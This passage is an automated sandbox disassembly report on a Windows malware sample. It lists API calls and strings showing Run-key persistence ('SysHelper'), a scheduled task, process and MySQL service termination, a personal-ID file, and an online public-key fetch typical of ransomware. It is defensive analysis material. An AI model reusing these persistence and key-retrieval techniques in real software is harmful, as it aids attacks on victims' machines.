ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
SysHelper, xrefs: 004123D6

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Function 00425B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
String ID:
API String ID: 1077091919-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

invalid string position, xrefs: 00418342
string too long, xrefs: 00418338

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
--Task, xrefs: 0040DBB5
Comment, xrefs: 0040DBFF

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

',', xrefs: 0046560B
fopen(', xrefs: 00465611
.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID, xrefs: 0040C946
C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

SHGetFolderPathW, xrefs: 0040F34D
Shell32.dll, xrefs: 0040F32C
\, xrefs: 0040F548

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

\\n, xrefs: 0040CC1B
Error encrypting message: %s, xrefs: 0040CE67
 , xrefs: 0040CCAF

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
DEK-Info: , xrefs: 00463422
Proc-Type: , xrefs: 0046337C
ENCRYPTED, xrefs: 004633BC

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8
SysHelper, xrefs: 0040C6EB, 0040C71D

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32(?,?), ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32

Strings

{"public_key":", xrefs: 0041EA2E
bowsakkdestx.txt, xrefs: 0041EA67

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
String ID: bowsakkdestx.txt${"public_key":"
API String ID: 2805819797-1771568745
Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B

Function 0042728B Relevance: 12.2, APIs: 8, Instructions: 202COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0042708B
DecodePointer.KERNEL32(?,?,?,?,000000FF,?,?,00463083,?,00000000,00000000), ref: 004271FE
DecodePointer.KERNEL32(?,?), ref: 0042722A
DecodePointer.KERNEL32(?,?), ref: 0042724F
__aulldvrm.LIBCMT ref: 00427385
_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
String ID:
API String ID: 1678825546-0
Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
Instruction ID: 52db3c5ac710bcba984e77d884e21c03200a6a5045cf61879664ec27deebefdc
Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
Instruction Fuzzy Hash: 27718471F092399BDF30DA58EC98BAAB7B5EF54314F5440DAD908A6241D7389EC0CF58

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

+, xrefs: 00457475
, xrefs: 00457482
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4
0123456789ABCDEF, xrefs: 004574D6

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Function 004273EA Relevance: 10.6, APIs: 7, Instructions: 129COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

